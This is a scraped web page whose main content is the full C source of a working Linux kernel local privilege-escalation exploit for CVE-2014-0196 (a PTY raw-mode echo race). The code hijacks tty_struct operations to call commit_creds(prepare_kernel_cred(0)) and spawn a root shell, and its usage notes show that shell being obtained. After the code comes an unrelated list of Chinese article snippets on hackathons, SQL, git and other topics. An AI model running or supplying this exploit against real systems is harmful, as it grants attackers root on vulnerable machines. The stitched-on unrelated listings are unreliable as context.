/*

 * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race

 * condition

 *

 * Slightly-less-than-POC privilege escalation exploit

 * For kernels >= v3.14-rc1

 *

 * Matthew Daley <mattd@bugfuzz.com>

 *

 * Usage:

 *   $ gcc cve-2014-0196-md.c -lutil -lpthread

 *   $ ./a.out

 *   [+] Resolving symbols

 *   [+] Resolved commit_creds: 0xffffffff81056694

 *   [+] Resolved prepare_kernel_cred: 0xffffffff810568a7

 *   [+] Doing once-off allocations

 *   [+] Attempting to overflow into a tty_struct...............

 *   [+] Got it :)

 *   # id

 *   uid=0(root) gid=0(root) groups=0(root)

 *

 * WARNING: The overflow placement is still less-than-ideal; there is a 1/4

 * chance that the overflow will go off the end of a slab. This does not

 * necessarily lead to an immediate kernel crash, but you should be prepared

 * for the worst (i.e. kernel oopsing in a bad state). In theory this would be

 * avoidable by reading /proc/slabinfo on systems where it is still available

 * to unprivileged users.

 *

 * Caveat: The vulnerability should be exploitable all the way from

 * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in

 * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer

 * GFP_ATOMIC memory consumption") that make exploitation simpler, which this

 * exploit relies on.

 *

 * Thanks to Jon Oberheide for his help on exploitation technique.

 */

#include <sys/stat.h>

#include <sys/types.h>

#include <fcntl.h>

#include <pthread.h>

#include <pty.h>

#include <stdio.h>

#include <string.h>

#include <termios.h>

#include <unistd.h>

#define TTY_MAGIC 0x5401

#define ONEOFF_ALLOCS 200

#define RUN_ALLOCS    30

struct device;

struct tty_driver;

struct tty_operations;

typedef struct {

	int counter;

} atomic_t;

struct kref {

	atomic_t refcount;

};

struct tty_struct_header {

	int	magic;

	struct kref kref;

	struct device *dev;

	struct tty_driver *driver;

	const struct tty_operations *ops;

} overwrite;

typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);

typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred);

int master_fd, slave_fd;

char buf[1024] = {0};

commit_creds_fn commit_creds;

prepare_kernel_cred_fn prepare_kernel_cred;

int payload(void) {

	commit_creds(prepare_kernel_cred(0));

	return 0;

}

unsigned long get_symbol(char *target_name) {

	FILE *f;

	unsigned long addr;

	char dummy;

	char name[256];

	int ret = 0;

	f = fopen("/proc/kallsyms", "r");

	if (f == NULL)

		return 0;

	while (ret != EOF) {

		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);

		if (ret == 0) {

			fscanf(f, "%s\n", name);

			continue;

		}

		if (!strcmp(name, target_name)) {

			printf("[+] Resolved %s: %p\n", target_name, (void *)addr);

			fclose(f);

			return addr;

		}

	}

	printf("[-] Couldn't resolve \"%s\"\n", name);

	fclose(f);

	return 0;

}

void *overwrite_thread_fn(void *p) {

	write(slave_fd, buf, 511);

	write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));

	write(slave_fd, &overwrite, sizeof(overwrite));

}

int main() {

	char scratch[1024] = {0};

	void *tty_operations[64];

	int i, temp_fd_1, temp_fd_2;

	for (i = 0; i < 64; ++i)

		tty_operations[i] = payload;

	overwrite.magic                 = TTY_MAGIC;

	overwrite.kref.refcount.counter = 0x1337;

	overwrite.dev                   = (struct device *)scratch;

	overwrite.driver                = (struct tty_driver *)scratch;

	overwrite.ops                   = (struct tty_operations *)tty_operations;

	puts("[+] Resolving symbols");

	commit_creds = (commit_creds_fn)get_symbol("commit_creds");

	prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");

	if (!commit_creds || !prepare_kernel_cred)

		return 1;

	puts("[+] Doing once-off allocations");

	for (i = 0; i < ONEOFF_ALLOCS; ++i)

		if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {

			puts("[-] pty creation failed");

			return 1;

		}

	printf("[+] Attempting to overflow into a tty_struct...");

	fflush(stdout);

	for (i = 0; ; ++i) {

		struct termios t;

		int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;

		pthread_t overwrite_thread;

		if (!(i & 0xfff)) {

			putchar('.');

			fflush(stdout);

		}

		if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {

			puts("\n[-] pty creation failed");

			return 1;

		}

		for (j = 0; j < RUN_ALLOCS; ++j)

			if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {

				puts("\n[-] pty creation failed");

				return 1;

			}

		close(fds[RUN_ALLOCS / 2]);

		close(fds2[RUN_ALLOCS / 2]);

		write(slave_fd, buf, 1);

		tcgetattr(master_fd, &t);

		t.c_oflag &= ~OPOST;

		t.c_lflag |= ECHO;

		tcsetattr(master_fd, TCSANOW, &t);

		if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {

			puts("\n[-] Overwrite thread creation failed");

			return 1;

		}

		write(master_fd, "A", 1);

		pthread_join(overwrite_thread, NULL);

		for (j = 0; j < RUN_ALLOCS; ++j) {

			if (j == RUN_ALLOCS / 2)

				continue;

			ioctl(fds[j], 0xdeadbeef);

			ioctl(fds2[j], 0xdeadbeef);

			close(fds[j]);

			close(fds2[j]);

		}

		ioctl(master_fd, 0xdeadbeef);

		ioctl(slave_fd, 0xdeadbeef);

		close(master_fd);

		close(slave_fd);

		if (!setresuid(0, 0, 0)) {

			setresgid(0, 0, 0);

			puts("\n[+] Got it :)");

			execl("/bin/bash", "/bin/bash", NULL);

		}

	}

}

CVE-2014-0196(马拉松赛跑bug)的更多相关文章

  1. SegmentFault 2014黑客马拉松 北京 作品demo

    1号作品展示——最熟悉的陌生人 app 利用录音(声纹识别)和照片来让好久不见的见面变得不那么尴尬. 2号作品展示——神奇魔镜 app 灵感来自通话<白雪公主>,穿越到今天的“魔镜”功能依 ...

  2. 洛谷P3113 [USACO14DEC]马拉松赛跑Marathon_Gold 线段树维护区间最大值 模板

    如此之裸- Code: #include<cstdio> #include<cstring> #include<cmath> #include<algorit ...

  3. 【独家】K8S漏洞报告 | 近期bug fix解读

    安全漏洞CVE-2019-3874分析 Kubernetes近期重要bug fix分析 Kubernetes v1.13.5 bug fix数据分析 ——本周更新内容 安全漏洞CVE-2019-387 ...

  4. Bash漏洞批量检测工具与修复方案

    &amp;amp;lt;img src="http://image.3001.net/images/20140928/14118931103311.jpg!small" t ...

  5. Daily record-August

    August11. A guide dog can guide a blind person. 导盲犬能给盲人引路.2. A guide dog is a dog especially trained ...

  6. 你真的会玩SQL吗?表表达式,排名函数

    你真的会玩SQL吗?系列目录 你真的会玩SQL吗?之逻辑查询处理阶段 你真的会玩SQL吗?和平大使 内连接.外连接 你真的会玩SQL吗?三范式.数据完整性 你真的会玩SQL吗?查询指定节点及其所有父节 ...

  7. [译]git log进阶

    格式化log输出 oneline --oneline标记将每个commit压缩成一行. 默认情况下显示一个commit ID和commit描述的第一行. 输出如下: 0e25143 Merge bra ...

  8. RFID应用范围

    RFID应用范围 (1)物流: 物流过程中的货物追踪,信息自动采集,仓储应用,港口应用,邮政,快递 (2)零售: 商品的销售数据实时统计,补货,防盗 (3)制造业: 生产数据的实时监控,质量追踪,自动 ...

  9. Android安全研究经验谈

    安全研究做什么 从攻击角度举例,可以是:对某个模块进行漏洞挖掘的方法,对某个漏洞进行利用的技术,通过逆向工程破解程序.解密数据,对系统或应用进行感染.劫持等破坏安全性的攻击技术等. 而防御上则是:查杀 ...

随机推荐

  1. UITableView中的visibleCells的用法(visibleCells帮上大忙了)

      这两天遇到一个问题,UITableView中需要加入动画,而且每一行的速度不一样. 刚开始做时把所有的cell都遍历一遍加上动画,后来发现,如果数据很多时,就会出现各种各样的问题,而且没有显示在界 ...

  2. 查看sql server数据库各表占用空间大小

    exec sp_MSForEachTable @precommand=N' create table ##(id int identity,表名 sysname,字段数 int,记录数 int,保留空 ...

  3. JavaScript那些事儿(01): 对象

    一. 对象是什么 是单身童鞋们正在查找的“对象”吗?是的,他/她就是活生生的对象. Javascript是一种基于对象的语言, 你遇到的所有东西几乎都是对象. 但它又不同于基于类的语言.那么“类”又是 ...

  4. 【转】各种字符串Hash函数比较

    常用的字符串Hash函数还有ELFHash,APHash等等,都是十分简单有效的方法.这些函数使用位运算使得每一个字符都对最后的函数值产生影响.另外还有以MD5和SHA1为代表的杂凑函数,这些函数几乎 ...

  5. 关于ligerui和其他前端脚本的学习方法(适用于自己)

    特别是看别人的源代码(来源于自己看的那个cms系统),比如ligerui,别人用的juery和ligerui结合的很灵活,比如下面一段代码 var itemiframe = "#framec ...

  6. 19 Remove Nth Node From End of List(去掉链表中倒数第n个节点Easy)

    题目意思:去掉链表中倒数第n个节点 思路:1.两次遍历,没什么技术含量,第一次遍历计算长度,第二次遍历找到倒数第k个,代码不写了   2.一次遍历,两个指针,用指针间的距离去计算. ps:特别注意删掉 ...

  7. phpstorm 配置

    JetBrains PhpStorm 8注册码一枚 username :cf96PiPYt271u1TC License Key : 97807-12042010 00001GctOKh8f206hl ...

  8. python 安装PyV8 和 lxml

    近来在玩python爬虫,需要使用PyV8模块和lxml模块.但是执行pip install xx 或者easy_install xx 指令都会提示一些错误.这些错误有些是提示pip版本过低或者缺少v ...

  9. Solr In Action 笔记(4) 之 SolrCloud分布式索引基础

    Solr In Action 笔记(4) 之 SolrCloud Index 基础 SolrCloud Index流程研究了两天,还是没有完全搞懂,先简单记下基础的知识,过几天再写个深入点的.先补充上 ...

  10. strcmp() Anyone?

    uva11732:http://uva.onlinejudge.org/index.php?option=com_onlinejudge&Itemid=8&page=show_prob ...